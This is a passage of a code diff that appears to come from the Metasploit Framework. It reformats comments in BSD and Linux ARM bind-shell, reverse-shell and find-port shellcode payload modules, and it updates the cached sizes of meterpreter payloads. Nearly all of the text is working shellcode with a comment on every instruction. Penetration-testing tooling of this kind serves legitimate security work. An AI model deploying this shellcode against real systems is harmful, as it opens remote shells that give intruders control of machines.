"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x52" + # push %rdx #
"\x52" + # push %rdx #
"\x52" + # push %rdx #
"\xba\x00\x1c\x11\x5C" + # mov edx,0x5c111c00 #
"\x52" + # push %rdx #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x6a\x1c" + # pushq $0x1c #
"\x5a" + # pop %rdx #
"\x04\x4c" + # add $0x4c,%al #
"\x0f\x05" + # syscall #
"\x48\x31\xf6" + # xor %rsi,%rsi #
"\x6a\x6a" + # pushq $0x6a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x04\x1e" + # add $0x1e,%al #
"\x0f\x05" + # syscall #
"\x48\x89\xc7" + # mov %rax,%rdi #
"\x6a\x5a" + # pushq $0x5a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x5a" + # add $0x5a,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
"\x69\x6e\x2f\x73\x68" + # mov "in/sh",%rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x39" + # add $0x39,%al #
"\x0f\x05" # syscall #
}
))
end

88
modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
View File

@ -33,50 +33,50 @@ module MetasploitModule
'LPORT' => [ 18, 'n' ],
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x02" +# pushq $0x2 #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x52" +# push %rdx #
"\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 #
"\x52" +# push %rdx #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x6a\x10" +# pushq $0x10 #
"\x5a" +# pop %rdx #
"\x04\x66" +# add $0x66,%al #
"\x0f\x05" +# syscall #
"\x48\x31\xf6" +# xor %rsi,%rsi #
"\x6a\x6a" +# pushq $0x6a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x04\x1e" +# add $0x1e,%al #
"\x0f\x05" +# syscall #
"\x48\x89\xc7" +# mov %rax,%rdi #
"\x6a\x5a" +# pushq $0x5a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x5a" +# add $0x5a,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f" +# mov "//" #
"\x62\x69\x6e\x2f" +# "bin/sh" #
"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x39" +# add $0x39,%al #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x02" + # pushq $0x2 #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x52" + # push %rdx #
"\xba\x00\x02\x11\x5C" + # mov edx,0x5c110200 #
"\x52" + # push %rdx #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x6a\x10" + # pushq $0x10 #
"\x5a" + # pop %rdx #
"\x04\x66" + # add $0x66,%al #
"\x0f\x05" + # syscall #
"\x48\x31\xf6" + # xor %rsi,%rsi #
"\x6a\x6a" + # pushq $0x6a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x04\x1e" + # add $0x1e,%al #
"\x0f\x05" + # syscall #
"\x48\x89\xc7" + # mov %rax,%rdi #
"\x6a\x5a" + # pushq $0x5a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x5a" + # add $0x5a,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f" + # mov "//" #
"\x62\x69\x6e\x2f" + # "bin/sh" #
"\x73\x68" + # mov $0x68732f6e69622f2f,%rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x39" + # add $0x39,%al #
"\x0f\x05" # syscall #
}
))

84
modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
View File

@ -35,51 +35,51 @@ module MetasploitModule
'SCOPEID' => [ 101, 'V' ]
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x1c" +# pushq $0x1c #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x04\x3e" +# add $0x3e,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\xff\xce" +# dec %esi #
"\xff\xce" +# dec %esi #
"\x04\x58" +# add $0x58,%al #
"\x0f\x05" +# syscall #
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x1c" + # pushq $0x1c #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x04\x3e" + # add $0x3e,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\xff\xce" + # dec %esi #
"\xff\xce" + # dec %esi #
"\x04\x58" + # add $0x58,%al #
"\x0f\x05" + # syscall #
"\xe9\x23\x00\x00\x00" + # jmpq <forth> #
# back:
"\x5e" +# pop %rsi #
"\x6a\x1c" +# pushq $0x1c #
"\x5a" +# pop %rdx #
"\x66\x83\xc0\x62" +# add $0x62,%ax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x3b" +# add $0x3b,%al #
"\x0f\x05" +# syscall #
"\x5e" + # pop %rsi #
"\x6a\x1c" + # pushq $0x1c #
"\x5a" + # pop %rdx #
"\x66\x83\xc0\x62" + # add $0x62,%ax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
"\x69\x6e\x2f\x73\x68" + # "in/sh",%rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x3b" + # add $0x3b,%al #
"\x0f\x05" + # syscall #
# forth:
"\xe8\xd8\xff\xff\xff" +# callq <back> #
"\xe8\xd8\xff\xff\xff" + # callq <back> #
# sockaddr_in6
"\x00\x1c\x11\x5c" +# AF_INET6+port #
"\x00\x00\x00\x00" +# no-one-cares #
"\x00\x00\x00\x00" +# IPv6- #
"\x00\x00\x00\x00" +# addr- #
"\x00\x00\x00\x00" +# in- #
"\x00\x00\x00\x01" +# 16 bytes #
"\x00\x1c\x11\x5c" + # AF_INET6+port #
"\x00\x00\x00\x00" + # no-one-cares #
"\x00\x00\x00\x00" + # IPv6- #
"\x00\x00\x00\x00" + # addr- #
"\x00\x00\x00\x00" + # in- #
"\x00\x00\x00\x01" + # 16 bytes #
"\x00\x00\x00\x00" # Scope ID #
}
))

74
modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
View File

@ -34,43 +34,43 @@ module MetasploitModule
'LPORT' => [ 37, 'n' ],
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x02" +# pushq $0x2 #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x04\x58" +# add $0x58,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\xff\xce" +# dec %esi #
"\xff\xce" +# dec %esi #
"\x04\x58" +# add $0x58,%al #
"\x0f\x05" +# syscall #
"\x52" +# push %rdx #
"\x48\xbb\x00\x02\x11" +# mov ... #
"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
"\x53" +# push %rbx #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x6a\x10" +# pushq $0x10 #
"\x5a" +# pop %rdx #
"\x66\x83\xc0\x62" +# add $0x62,%ax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x3b" +# add $0x3b,%al #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x02" + # pushq $0x2 #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x04\x58" + # add $0x58,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\xff\xce" + # dec %esi #
"\xff\xce" + # dec %esi #
"\x04\x58" + # add $0x58,%al #
"\x0f\x05" + # syscall #
"\x52" + # push %rdx #
"\x48\xbb\x00\x02\x11" + # mov ... #
"\x5c\x7f\x00\x00\x01" + # mov $0x100007f5c110200,%rbx #
"\x53" + # push %rbx #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x6a\x10" + # pushq $0x10 #
"\x5a" + # pop %rdx #
"\x66\x83\xc0\x62" + # add $0x62,%ax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
"\x69\x6e\x2f\x73\x68" + # "in/sh", %rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x3b" + # add $0x3b,%al #
"\x0f\x05" # syscall #
}
))

74
modules/payloads/singles/bsd/x86/shell_bind_tcp.rb
View File

@ -32,43 +32,43 @@ module MetasploitModule
'LPORT' => [ 6, 'n' ],
},
'Payload' =>
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
"\x89\xe7" +# movl %esp,%edi #
"\x50" +# pushl %eax #
"\x6a\x01" +# pushl $0x01 #
"\x6a\x02" +# pushl $0x02 #
"\x6a\x10" +# pushl $0x10 #
"\xb0\x61" +# movb $0x61,%al #
"\xcd\x80" +# int $0x80 #
"\x57" +# pushl %edi #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x68" +# pushl $0x68 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x89\x47\xec" +# movl %eax,-0x14(%edi) #
"\xb0\x6a" +# movb $0x6a,%al #
"\xcd\x80" +# int $0x80 #
"\xb0\x1e" +# movb $0x1e,%al #
"\xcd\x80" +# int $0x80 #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x5a" +# pushl $0x5a #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\xff\x4f\xe4" +# decl -0x1c(%edi) #
"\x79\xf6" +# jns <bndsockcode+42> #
"\x50" +# pushl %eax #
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
"\x89\xe3" +# movl %esp,%ebx #
"\x50" +# pushl %eax #
"\x54" +# pushl %esp #
"\x53" +# pushl %ebx #
"\x50" +# pushl %eax #
"\xb0\x3b" +# movb $0x3b,%al #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
"\x89\xe7" + # movl %esp,%edi #
"\x50" + # pushl %eax #
"\x6a\x01" + # pushl $0x01 #
"\x6a\x02" + # pushl $0x02 #
"\x6a\x10" + # pushl $0x10 #
"\xb0\x61" + # movb $0x61,%al #
"\xcd\x80" + # int $0x80 #
"\x57" + # pushl %edi #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x68" + # pushl $0x68 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x89\x47\xec" + # movl %eax,-0x14(%edi) #
"\xb0\x6a" + # movb $0x6a,%al #
"\xcd\x80" + # int $0x80 #
"\xb0\x1e" + # movb $0x1e,%al #
"\xcd\x80" + # int $0x80 #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x5a" + # pushl $0x5a #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\xff\x4f\xe4" + # decl -0x1c(%edi) #
"\x79\xf6" + # jns <bndsockcode+42> #
"\x50" + # pushl %eax #
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
"\x89\xe3" + # movl %esp,%ebx #
"\x50" + # pushl %eax #
"\x54" + # pushl %esp #
"\x53" + # pushl %ebx #
"\x50" + # pushl %eax #
"\xb0\x3b" + # movb $0x3b,%al #
"\xcd\x80" # int $0x80 #
}
))

64
modules/payloads/singles/bsd/x86/shell_find_port.rb
View File

@ -32,38 +32,38 @@ module MetasploitModule
'CPORT' => [ 25, 'n' ],
},
'Payload' =>
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x89\xe7" +# movl %esp,%edi #
"\x6a\x10" +# pushl $0x10 #
"\x54" +# pushl %esp #
"\x57" +# pushl %edi #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x58" +# popl %eax #
"\x58" +# popl %eax #
"\x40" +# incl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x1f" +# pushl $0x1f #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x66\x81\x7f\x02\x04\xd2"+# cmpw $0xd204,0x02(%edi) #
"\x75\xee" +# jne <fndsockcode+11> #
"\x50" +# pushl %eax #
"\x6a\x5a" +# pushl $0x5a #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\xff\x4f\xf0" +# decl -0x10(%edi) #
"\x79\xf6" +# jns <fndsockcode+30> #
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
"\x89\xe3" +# movl %esp,%ebx #
"\x50" +# pushl %eax #
"\x54" +# pushl %esp #
"\x53" +# pushl %ebx #
"\x50" +# pushl %eax #
"\xb0\x3b" +# movb $0x3b,%al #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x89\xe7" + # movl %esp,%edi #
"\x6a\x10" + # pushl $0x10 #
"\x54" + # pushl %esp #
"\x57" + # pushl %edi #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x58" + # popl %eax #
"\x58" + # popl %eax #
"\x40" + # incl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x1f" + # pushl $0x1f #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x66\x81\x7f\x02\x04\xd2"+ # cmpw $0xd204,0x02(%edi) #
"\x75\xee" + # jne <fndsockcode+11> #
"\x50" + # pushl %eax #
"\x6a\x5a" + # pushl $0x5a #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\xff\x4f\xf0" + # decl -0x10(%edi) #
"\x79\xf6" + # jns <fndsockcode+30> #
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
"\x89\xe3" + # movl %esp,%ebx #
"\x50" + # pushl %eax #
"\x54" + # pushl %esp #
"\x53" + # pushl %ebx #
"\x50" + # pushl %eax #
"\xb0\x3b" + # movb $0x3b,%al #
"\xcd\x80" # int $0x80 #
}
))

60
modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb
View File

@ -33,36 +33,36 @@ module MetasploitModule
'LPORT' => [ 8, 'n' ],
},
'Payload' =>
"\x68\x7f\x00\x00\x01" +# pushl $0x0100007f #
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
"\x89\xe7" +# movl %esp,%edi #
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x6a\x01" +# pushl $0x01 #
"\x6a\x02" +# pushl $0x02 #
"\x6a\x10" +# pushl $0x10 #
"\xb0\x61" +# movb $0x61,%al #
"\xcd\x80" +# int $0x80 #
"\x57" +# pushl %edi #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x62" +# pushl $0x62 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x50" +# pushl %eax #
"\x6a\x5a" +# pushl $0x5a #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\xff\x4f\xe8" +# decl -0x18(%edi) #
"\x79\xf6" +# jns <cntsockcode+34> #
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
"\x89\xe3" +# movl %esp,%ebx #
"\x50" +# pushl %eax #
"\x54" +# pushl %esp #
"\x53" +# pushl %ebx #
"\x50" +# pushl %eax #
"\xb0\x3b" +# movb $0x3b,%al #
"\x68\x7f\x00\x00\x01" + # pushl $0x0100007f #
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
"\x89\xe7" + # movl %esp,%edi #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x6a\x01" + # pushl $0x01 #
"\x6a\x02" + # pushl $0x02 #
"\x6a\x10" + # pushl $0x10 #
"\xb0\x61" + # movb $0x61,%al #
"\xcd\x80" + # int $0x80 #
"\x57" + # pushl %edi #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x62" + # pushl $0x62 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x50" + # pushl %eax #
"\x6a\x5a" + # pushl $0x5a #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\xff\x4f\xe8" + # decl -0x18(%edi) #
"\x79\xf6" + # jns <cntsockcode+34> #
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
"\x89\xe3" + # movl %esp,%ebx #
"\x50" + # pushl %eax #
"\x54" + # pushl %esp #
"\x53" + # pushl %ebx #
"\x50" + # pushl %eax #
"\xb0\x3b" + # movb $0x3b,%al #
"\xcd\x80" # int $0x80 #
}
))

2
modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 967896
CachedSize = 968136
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 967896
CachedSize = 968136
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 967896
CachedSize = 968136
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 902868
CachedSize = 902904
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 902868
CachedSize = 902904
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 902868
CachedSize = 902904
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

106
modules/payloads/singles/linux/armbe/shell_bind_tcp.rb
View File

@ -41,74 +41,74 @@ module MetasploitModule
payload =
# turning on thumb mode
"\xe2\x8f\x60\x01" +# add r6, pc, #1 #
"\xe1\x2f\xff\x16" +# bx r6 #
"\xe2\x8f\x60\x01" + # add r6, pc, #1 #
"\xe1\x2f\xff\x16" + # bx r6 #
# thumb mode on
# socket(2,1,0)
"\x1a\x92" +# sub r2, r2, r2 #
"\x1c\x51" +# add r1, r2, #1 #
"\x1c\x90" +# add r0, r2, #2 #
"\x02\x0f" +# lsl r7, r1, #8 #
"\x37\x19" +# add r7, r7, #0x19 #
"\xdf\x01" +# svc 1 #
"\x1c\x06" +# mov r6, r0 #
"\x1a\x92" + # sub r2, r2, r2 #
"\x1c\x51" + # add r1, r2, #1 #
"\x1c\x90" + # add r0, r2, #2 #
"\x02\x0f" + # lsl r7, r1, #8 #
"\x37\x19" + # add r7, r7, #0x19 #
"\xdf\x01" + # svc 1 #
"\x1c\x06" + # mov r6, r0 #
# bind()
"\x22\x02" +# mov r2, #2 #
"\x02\x12" +# lsl r2, r2, #8 #
"\x32"+bytehigh +# add r2, r2, #0xXX #
"\x02\x12" +# lsl r2, r2, #8 #
"\x32"+bytelow +# add r2, r2, #0xXX #
"\x1a\xdb" +# sub r3, r3, r3 #
"\x1b\x24" +# sub r4, r4, r4 #
"\x1b\x6d" +# sub r5, r5, r5 #
"\x46\x69" +# mov r1, sp #
"\xc1\x3c" +# stm r1!, {r2-r5} #
"\x39\x10" +# sub r1, #0x10 #
"\x22\x10" +# mov r2, #16 #
"\x37\x01" +# add r7, r7, #1 #
"\xdf\x01" +# svc 1 #
"\x22\x02" + # mov r2, #2 #
"\x02\x12" + # lsl r2, r2, #8 #
"\x32"+bytehigh + # add r2, r2, #0xXX #
"\x02\x12" + # lsl r2, r2, #8 #
"\x32"+bytelow + # add r2, r2, #0xXX #
"\x1a\xdb" + # sub r3, r3, r3 #
"\x1b\x24" + # sub r4, r4, r4 #
"\x1b\x6d" + # sub r5, r5, r5 #
"\x46\x69" + # mov r1, sp #
"\xc1\x3c" + # stm r1!, {r2-r5} #
"\x39\x10" + # sub r1, #0x10 #
"\x22\x10" + # mov r2, #16 #
"\x37\x01" + # add r7, r7, #1 #
"\xdf\x01" + # svc 1 #
# listen()
"\x1c\x30" +# mov r0, r6 #
"\x1a\x49" +# sub r1, r1, r1 #
"\x37\x02" +# add r7, r7, #2 #
"\xdf\x01" +# svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x1a\x49" + # sub r1, r1, r1 #
"\x37\x02" + # add r7, r7, #2 #
"\xdf\x01" + # svc 1 #
# accept()
"\x1c\x30" +# mov r0, r6 #
"\x1a\x92" +# sub r2, r2, r2 #
"\x37\x01" +# add r7, r7, #1 #
"\xdf\x01" +# svc 1 #
"\x1c\x06" +# mov r6, r0 #
"\x1c\x30" + # mov r0, r6 #
"\x1a\x92" + # sub r2, r2, r2 #
"\x37\x01" + # add r7, r7, #1 #
"\xdf\x01" + # svc 1 #
"\x1c\x06" + # mov r6, r0 #
# dup2()
"\x1a\x49" +# sub r1, r1, r1 #
"\x27\x3f" +# mov r7, #63 #
"\xdf\x01" +# svc 1 #
"\x1c\x30" +# mov r0, r6 #
"\x31\x01" +# add r1, r1, #1 #
"\xdf\x01" +# svc 1 #
"\x1c\x30" +# mov r0, r6 #
"\x31\x01" +# add r1, r1, #1 #
"\xdf\x01" +# svc 1 #
"\x1a\x49" + # sub r1, r1, r1 #
"\x27\x3f" + # mov r7, #63 #
"\xdf\x01" + # svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x31\x01" + # add r1, r1, #1 #
"\xdf\x01" + # svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x31\x01" + # add r1, r1, #1 #
"\xdf\x01" + # svc 1 #
# execve()
"\x1a\x92" +# sub r2, r2, r2 #
"\x46\x78" +# mov r0, pc #
"\x30\x12" +# add r0, #18 #
"\x92\x02" +# str r2, [sp, #8] #
"\x90\x01" +# str r0, [sp, #4] #
"\xa9\x01" +# add r1, sp, #4 #
"\x27\x0b" +# mov r7, #11 #
"\xdf\x01" +# svc 1 #
"\x1a\x92" + # sub r2, r2, r2 #
"\x46\x78" + # mov r0, pc #
"\x30\x12" + # add r0, #18 #
"\x92\x02" + # str r2, [sp, #8] #
"\x90\x01" + # str r0, [sp, #4] #
"\xa9\x01" + # add r1, sp, #4 #
"\x27\x0b" + # mov r7, #11 #
"\xdf\x01" + # svc 1 #
# exit()
"\x1b\x24" +# sub r4, r4, r4 #
"\x1c\x20" +# mov r0, r4 #
"\x27\x01" +# mov r7, #1 #
"\xdf\x01" +# svc 1 #
"\x1b\x24" + # sub r4, r4, r4 #
"\x1c\x20" + # mov r0, r4 #
"\x27\x01" + # mov r7, #1 #
"\xdf\x01" + # svc 1 #
cmd
end
end

2
modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 903216
CachedSize = 903252
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 903216
CachedSize = 903252
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 903216
CachedSize = 903252
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1388224
CachedSize = 1388296
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1388224
CachedSize = 1388296
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1388224
CachedSize = 1388296
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1284772
CachedSize = 1284844
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1284772
CachedSize = 1284844
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1284772
CachedSize = 1284844
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
View File

